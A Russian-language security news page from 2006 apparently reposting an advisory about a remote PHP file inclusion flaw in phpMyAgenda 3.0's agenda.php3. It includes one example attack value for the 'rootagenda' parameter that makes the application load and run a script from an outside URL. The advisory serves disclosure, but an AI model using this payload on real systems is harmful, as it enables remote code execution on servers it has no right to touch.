PHP-инклюдинг в phpMyAgenda - 27 Апреля 2006 - Программирование, защита систем, сайтов.Новости, статьи
Пятница
12/Ноя/2010, 12:40:01
ExCode
 Приветствую Вас Гость | RSS
Главная Регистрация Вход
Категории раздела
Уязвимости [139]
Уязвимости в сервисах, программах, системах
Безопасность [41]
Разработки ПО [15]
Разное [88]
Вирусы/Трояны [69]
Железо [21]
Пираты / Хакеры / Аресты [21]
Здесь публикуются новости о каких либо проблемах с законом в сфере IT .

Наш опрос
Зарабатывайте вместе с UcoZ!
Какой ОС Вы пользуетесь

[ Результаты · Архив опросов ]

Всего ответов: 294
Главная » 2006 » Апрель » 27 » PHP-инклюдинг в phpMyAgenda
PHP-инклюдинг в phpMyAgenda
10:59:11
Программа: phpMyAgenda 3.0 Final, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "rootagenda" в сценарии agenda.php3. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

rootagenda=http://www.yourspace.com/yourscript.php?

URL производителя: www.phpmyagenda.com

Категория: Уязвимости | Просмотров: 307 | Добавил: BlackMage
Всего комментариев: 0
Имя *:
Email:
Код *:
Форма входа
E-mail:
Пароль:

Поиск

Календарь
«  Апрель 2006  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
24252627282930

Архив записей

Друзья сайта
  • Создать сайт
  • Все для веб-мастера
  • Программы для всех
  • Блокнот программиста

    • Статистика
    Онлайн всего: 5
    Гостей: 5
    Пользователей: 0

    Copyright Veon © 2006-2009
    блок контейнер